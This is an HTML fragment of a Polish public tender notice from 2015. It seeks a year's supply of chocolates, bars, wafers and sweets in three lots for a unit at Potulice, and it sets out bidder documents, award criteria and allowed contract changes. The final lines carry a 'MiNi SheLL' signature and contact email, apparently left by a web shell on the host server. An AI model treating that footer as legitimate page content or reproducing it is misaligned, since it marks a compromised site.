3.	W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 2 pkt 5 ustawy Pzp wykonawca składa do oferty: zgodnie z art. 26 ust. 2d ustawy Pzp listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z pózn. zm.) albo informację o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 4 do siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 1, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2. W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 2, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1) podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz);
2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 2 pkt 5 ustawy Pzp wykonawca składa do oferty: zgodnie z art. 26 ust. 2d ustawy Pzp listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z pózn. zm.) albo informację o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 4 do siwz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 1, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2. W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 2, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1) podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz);
2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 2 pkt 5 ustawy Pzp wykonawca składa do oferty: zgodnie z art. 26 ust. 2d ustawy Pzp listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z pózn. zm.) albo informację o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 4 do siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - TERMIN realizacji reklamacji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1) nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i lub pkt 2
2) cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1
3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy
4) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego;
5) zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
6) terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3;
7) dopisania do § 5 pkt 1 ppkt 1 magazynu zlokalizowanego w Chełmnie, ul. 22 stycznia 3a.
3. Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu, z zastrzeżeniem pkt 5 i pkt 6.
4. Strona wnioskująca o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy.
5. Strony dopuszczają możliwość okresowych dostaw artykułów po cenie niższej niż określonej w załączniku nr 1 do umowy (tzw. promocja). Zmiany te nie wymagają potwierdzenia pisemnego w postaci aneksu do umowy.
6. Strony dopuszczają możliwość okresowych dostaw artykułów w opakowaniach o większej gramaturze lub większej ilości sztuk w opakowaniu (tzw. promocja) niż określone w załączniku nr 1 do umowy przy zachowaniu niezmienionej ceny. Zmiany te nie wymagają potwierdzenia pisemnego w postaci aneksu do umowy.
7. Zmiana postanowień niniejszej umowy na podstawie pkt 2 ppkt 2) nie może następować częściej niż raz na kwartał.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igbbaltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA O/Potulice
ul.Aleja Parkowa 1
89-120 Potulice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2015 godzina 12:00, miejsce: BIGB BALTICA O/Potulice
ul.Aleja Parkowa 1
89-120 Potulice
sekretariat Zakładu Karnego w Potulicach.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Czekolada mleczna nadziewana różne smaki 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
2) Czekolada mleczna z orzechami 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
3) Czekolada mleczna 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
4) Czekolada mleczna bakaliowa z rodzynkami i orzechami 100 g, ilość szacunkowa 10000 sztuk. CPV: 15842100-3.
5) Czekolada gorzka E.Wedel 100 g, ilość szacunkowa 5000 sztuk. CPV: 15842100-3.
6) Czekolada mleczna nadziewana E.Wedel 100 g, różne smaki, ilość szacunkowa 5000 sztuk. CPV: 15842100-3.
7) Czekolada mleczna E.Wedel 100 g, ilość szacunkowa 2000 sztuk. CPV: 15842100-3.
8) Czekolada mleczna z całymi orzechami laskowymi Alpen Gold NusseBeiser 100 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
9) Czekolada biała 100 g, ilość szacunkowa 1500 sztuk. CPV: 15842100-3.
10) Czekolada mleczna z orzechami laskowymi Alpen Gold 90 g, ilość szacunkowa 2000 sztuk. CPV: 15842100-3.
11) Czekolada biała bourbon-wanilia Alpen Gold 90 g, ilość szacunkowa 2000 sztuk. CPV: 15842100-3.
12) Czekolada mleczna bakaliowa z rodzynkami i orzechami - terravita 225 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
13) Czekolada mleczna z orzechami - terravita 225 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
14) Czekolada mleczna - terravita 225 g, ilość szacunkowa 3000 sztuk. CPV: 15842100-3.
15) Czekolada mleczna Pytania kartonik - terravita 225 g, ilość szacunkowa 3000 sztuk. CPV:15842100-3.
16) Czekolada mleczna z orzechami laskowymi E.Wedel 100 g, ilość szacunkowa 1500 sztuk. CPV: 15842100-3.
17) Czekolada mleczna z rodzynkami i orzechami laskowymi - milka (Raisin&Nut) 100 g, ilość szacunkowa 1500 sztuk. CPV: 15842100-3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. TERMIN realizacji reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Grupa 2:
1) Baton Mars 47 g. Nugatowe nadzienie, karmel, mleczna czekolada, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
2) Baton Snickers 50 g. Nugatowe nadzienie, prażone orzeszki ziemne, karmel, ilość szacunkowa 12000 sztuk. CPV: 15842220-0.
3) Baton Lion 42 g. Nadziewany wafel z karmelem i płatkami ryżowymi w polewie kakaowej, ilość szacunkowa 7000 sztuk. CPV: 15842220-0.
4) Baton 3 Bit 41 g. Baton w czekoladzie mlecznej z nadzieniem mlecznym i herbatnikiem, ilość szacunkowa 7000 sztuk. CPV: 15842220-0.
5) Baton KitKat 40 g. Paluszek waflowy w mlecznej czekoladzie, ilość szacunkowa 6000 sztuk. CPV: 15842220-0.
6) Baton Pawełek różne smaki 45 g. Batonik z nadzieniem w mlecznej czekoladzie, ilość szacunkowa 4200 sztuk. CPV: 15842220-0.
7) Baton Twix 51 g (2x25,5 g). Ciasteczka oblane kremem i mleczną czekoladą, ilość szacunkowa 3600 sztuk. CPV: 15842220-0.
8) Baton Kinder Boueno 43 g. Dwa batony w opakowaniu, pojedynczo pakowane. Wafel pokryty mleczną czekoladą, wypełniony mleczno-orzechowym nadzieniem, ilość szacunkowa 3600 sztuk. CPV: 15842220-0.
9) Baton Bounty 57 g. Wiórki kokosowe oblane mleczną czekoladą, ilość szacunkowa 3400 sztuk. CPV: 15842220-0.
10) Wafelek kakaowy w polewie czekoladowej 30 g, ilość szacunkowa 60000 sztuk. CPV: 15842220-0.
11) Wafelek orzechowy w polewie czekoladowej 30 g, ilość szacunkowa 60000 sztuk. CPV: 15842220-0.
12) Wafelek Grześki 36 g, przekładany kremem kakaowym w czekoladzie, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
13) Wafelek Grześki 36g, przekładany kremem orzechowym w czekoladzie, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
14) Wafelek Grześki 36 g, przekładany kremem toffi w czekoladzie, ilość szacunkowa 9000 sztuk. CPV: 15842220-0.
15) Wafelek Grześki 28 g, przekładany kremem kakaowym bez czekolady, ilość szacunkowa 9000 sztuk CPV: 15842220-0.
16) Wafle Familijne Jutrzenka różne smaki 180 g, ilość szacunkowa 5000 sztuk. CPV: 15842220-0.
17) Wafelek Princessa różne smaki 35-37 g przekładany kremem oblany mleczną czekoladą, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
18) Wafelek Prince Polo XXL różne smaki 50 g, ilość szacunkowa 5000 sztuk. CPV: 15842220-0.
19) Wafle teatralne w czekoladzie Kopernik 46 g, ilość szacunkowa 4000 sztuk. CPV: 15842220-0.
20) Milky way 21,5 g baton , ilość szacunkowa 2000 sztuk. CPV: 15842220-0.
21) Rogal 7 Days Chipita o nadzieniu o różnych smakach 60 g, ilość szacunkowa 2000 sztuk. CPV: 15842220-0.
22) Rolada długoterminowa TAGO 200 g, różne smaki, ilość szacunkowa 1500 sztuk. CPV: 15842300-5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.22-0, 15.84.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. TERMIN realizacji reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3. Grupa 3:
1) Markizy kakaowe Hit Bahlsen 225 g, ilość szacunkowa 2000 sztuk. CPV: 15842300-5.
2) Markizy kakaowe 400 g - 500 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
3) Chałwa waniliowa  65 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
4) Chałwa różne smaki 65 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
5) Chałwa waniliowa w polewie czekoladowej 50 g , ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
6) Cukierki czekoladowe nadziewane - mieszanka E.Wedel paczkowane 210 g - 240 g, ilość szacunkowa 500 sztuk. CPV: 15842200-4.
7) Cukierki czekoladowe nadziewane - mieszanka 210 g - 240 g, ilość szacunkowa 500 sztuk. CPV: 15842200-4.
8) Cukierki Nimm2 90 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
9) Cukierki Werthers orginal 90 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
10) Cukierki Kopiko 120 g, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
11) Landrynki-karmelki twarde miętowe 80 g, ilość szacunkowa 4800 sztuk. CPV: 15842300-5.
12) Landrynki-karmelki twarde o smaku owocowym 80 g , ilość szacunkowa 4800 sztuk. CPV: 15842300-5.
13) Krówki paczkowane 130, ilość szacunkowa 2000 sztuk. CPV: 15842300-5.
14) Jeżyki Jutrzenka różne smaki 140 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
15) Delicje E.Wedel różne smaki 147 g, ilość szacunkowa 2400 sztuk. CPV: 15842300-5.
16) Pieguski E.Wedel różne smaki 135 g, ilość szacunkowa 1100 sztuk. CPV: 15842300-5.
17) Krakuski florianki 143 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
18) Krakuski serduszka 143 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
19) Krakuski ciastka maślane 150 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
20) Krakuski deserowe z cukrem 150 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
21) Krakuski kokosowe 125 g, ilość szacunkowa 1400 sztuk. CPV: 15842300-5.
22) Biszkopty 120 g, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
23) Biszkopty z galaretką w polewie czekoladowej różne smaki 130 g, ilość szacunkowa 7200 sztuk. CPV: 15842300-5.
24) Herbatniki Petit Beurry 100 g, ilość szacunkowa 3200 sztuk. CPV: 15821200-1.
25) Paluszki solone 70 g - 80 g, ilość szacunkowa 3600 sztuk. CPV: 15842300-5.
26) Sękacz kakaowy 32 g, ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
27) Ptasie mleczko waniliowe w polewie czekoladowej E.Wedel 380 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
28) Ptasie mleczko waniliowe w polewie czekoladowej 500 g, ilość szacunkowa 2000 sztuk. CPV: 15842300-5.
29) Galaretka w czekoladzie różne smaki Jutrzenka 190 g, ilość szacunkowa 400 sztuk. CPV: 15842300-5.
30) Pierniki z nadzieniem paczkowane od 220 g - 240 g różne smaki, ilość szacunkowa 1500 sztuk. CPV: 15842300-5.
31) Pierniki w czekoladzie 400 g , ilość szacunkowa 1200 sztuk. CPV: 15842300-5.
32) Toffifee bombonierka 125 g. Orzech laskowy w karmelu, ilość szacunkowa 250 sztuk. CPV: 15842300-5.
33) Chipsy Frito Lay różne smaki 80 g , ilość szacunkowa 3200 sztuk. CPV: 15842300-5.
34) Ciastka zbożowe 143 g , ilość szacunkowa 700 sztuk. CPV: 15842300-5.
35) Guma do żucia orbit drażetki Pepperm 10 draż. w opakowaniu, ilość szacunkowa 3600 opakowań po 10 draż. CPV: 15842300-5.
36) Guma do żucia orbit drażetki Spearmin 10 draż. w opakowaniu, ilość szacunkowa 3600 opakowań po 10 draż. CPV: 15842300-5.
37) Napój czekoladowy instant - rozpuszczalny 300 g. CPV: 15841000-5, ilość szacunkowa 700 sztuk.
38) Cukierki czekoladowe Malaga - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
39) Cukierki czekoladowe Tiki-Taki - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
40) Cukierki czekoladowe Kasztanki - Wawel luz od 2,0 kg - 2,5 kg, ilość szacunkowa 50 kg. CPV: 15842000-2.
41) Paluszki serowo-cebulowe 220 g - 250 g, ilość szacunkowa 300 sztuk, CPV:15842300-5.
42) Lizaki serduszka, ilość szacunkowa 2400 sztuk, CPV 15842300-5.
43) Lizaki Chupa-Chups, ilość szacunkowa 2000 sztuk, CPV 15842300-5.
44) Draże kokosowe, paczkowane opakowanie o wadze 80 g ilość szacunkowa 4000 sztuk, CPV: 15842300-5.
45) Draże kakaowe paczkowane opakowanie o wadze 80 g ilość szacunkowa 4000 sztuk, CPV: 15842300-5.
46) Draże śmietankowe paczkowane opakowanie o wadze 80 g ilość szacunkowa 4000 sztuk, CPV: 15842300-5.
47) Kamyki orzechowe - kruche orzeszki arachidowe oblane kolorowym lukrem, paczkowane opakowanie o wadze 90 g - 100 g, ilość szacunkowa 1000 sztuk. CPV: 15842400-6.
48) BOMBONIERKA Ferrero Raffaello - opakowanie o wadze 150 g, ilość szacunkowa 200 sztuk. CPV: 15842300-5.
49) Rodzynki w czekoladzie o wadze 100 g, ilość szacunkowa 1000 sztuk. CPV: 15332412-5.
50) Drażetki Mentos o wadze 37 g - 43 g, różne smaki, ilość szacunkowa 1000 sztuk. CPV:15842300-5.
51) Drażetki Tic-Tak o wadze 16 g, różne smaki, ilość szacunkowa 1000 sztuk. CPV:15842300-5.
52) Cukierki Raczki o wadze 120 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
53) Krakersy o wadze 170 g , ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
54) Wafle Knoppers o wadze 25 g, ilość szacunkowa 1000 sztuk. CPV: 15842300-5.
55) Rurki TAGO - opakowania luzowe 3 kg, różne smaki, ilość szacunkowa 300 sztuk. CPV: 15842300-5.
56) Piernik duet TAGO - opakowania luzowe 1,5 kg, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
57) Ciastka kruche z nadzieniem po środku - Słoneczniki TAGO - opakowania luzowe 2 kg, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
58) Ciastka kruche - Śnieżynki TAGO - opakowania luzowe 2 kg, ilość szacunkowa 600 sztuk. CPV: 15842300-5.
59) Jogusie mix PSZCZÓŁKA - opakowanie zbiorcze 3 kg, mieszanka 4 cukierków z nadzieniem mlecznym o smakach: cytrynowym, brzoskwiniowym, malinowym i poziomkowym, ilość szacunkowa 500 sztuk. CPV: 15842300-5.
60) Michałki Piastowskie ODRA - opakowanie 2 kg, cukierki orzechowe oblane czekoladą, ilość szacunkowa 500 sztuk. CPV: 15842300-5.
61) Mieszanka rodzinna MIESZKO - opakowanie zbiorcze 2,5 kg, mieszanka czekoladek i galaretek w czekoladzie deserowej w ośmiu smakach, ilość szacunkowa 500 sztuk. CPV: 15842300-5.
62) Cukierki toffee butter oraz toffee vanilla MIESZKO - opakowanie zbiorcze 3 kg, ilość szacunkowa 500 sztuk. CPV: 15842300-5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. TERMIN realizacji reklamacji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com